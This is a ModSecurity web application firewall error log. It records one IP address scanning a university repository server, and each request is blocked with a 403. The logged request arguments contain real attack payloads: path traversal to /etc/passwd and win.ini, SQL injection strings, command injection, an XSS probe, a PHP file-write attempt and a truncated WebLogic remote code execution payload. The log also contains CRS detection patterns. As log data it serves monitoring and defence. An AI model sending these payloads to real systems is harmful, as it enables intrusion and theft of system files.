[Tue Aug 29 11:46:12.562690 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAi0JJkAAAAK"]
[Tue Aug 29 11:46:13.367891 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAib50EAAAAA"]
[Tue Aug 29 11:46:13.414885 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhtjjsAAAAq"]
[Tue Aug 29 11:46:13.427081 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAdxUrAAAAAC"]
[Tue Aug 29 11:46:14.411443 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FsCo-f0AAAdxUrYAAAAC"]
[Tue Aug 29 11:46:14.424443 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAhBSGEAAAAX"]
[Tue Aug 29 11:46:15.409615 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAipS6gAAAAF"]
[Tue Aug 29 11:46:15.458681 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAhT32oAAAAD"]
[Tue Aug 29 11:46:18.364873 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAib51sAAAAA"]
[Tue Aug 29 11:46:18.489004 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAib52EAAAAA"]
[Tue Aug 29 11:46:19.400799 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAi2yDUAAAAN"]
[Tue Aug 29 11:46:19.433593 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14G8Co-f0AAAhgoN0AAAAb"]
[Tue Aug 29 11:46:20.622878 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAhZRm8AAAAG"]
[Tue Aug 29 11:46:23.463465 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14H8Co-f0AAAi0JL0AAAAK"]
[Tue Aug 29 11:46:27.404014 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAi-RBkAAAAH"]
[Tue Aug 29 11:46:28.368225 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAdxUvEAAAAC"]
[Tue Aug 29 11:46:28.404646 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAhZRpwAAAAG"]
[Tue Aug 29 11:46:28.545003 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAib55wAAAAA"]
[Tue Aug 29 11:46:29.728544 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAi0JOsAAAAK"]
[Tue Aug 29 11:46:30.718373 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAjCa8cAAAAB"]
[Tue Aug 29 11:46:30.753336 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAi5uHUAAAAS"]
[Tue Aug 29 11:46:31.383640 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAjH@s4AAAAI"]
[Tue Aug 29 11:46:31.590232 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAjCa9IAAAAB"]
[Tue Aug 29 11:46:33.420894 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAhT340AAAAD"]
[Tue Aug 29 11:46:33.485748 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAfEB@gAAAAO"]
[Tue Aug 29 11:46:34.447610 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAi-RDIAAAAH"]
[Tue Aug 29 11:46:35.423789 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAhtjm8AAAAq"]
[Tue Aug 29 11:46:39.432560 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAi2yFwAAAAN"]
[Tue Aug 29 11:46:41.457550 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAhl0E0AAAAi"]
[Tue Aug 29 11:46:42.477527 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAi-RFkAAAAH"]
[Tue Aug 29 11:46:43.648700 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAi3Z00AAAAP"]
[Tue Aug 29 11:46:47.448645 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAi-RGYAAAAH"]
[Tue Aug 29 11:46:50.416525 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OsCo-f0AAAi@TAoAAAAM"]
[Tue Aug 29 11:46:52.502120 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAi@TBIAAAAM"]
[Tue Aug 29 11:46:54.991768 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14PsCo-f0AAAjZRXEAAAAS"]
[Tue Aug 29 11:47:01.359467 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RcCo-f0AAAjcHWwAAAAY"]
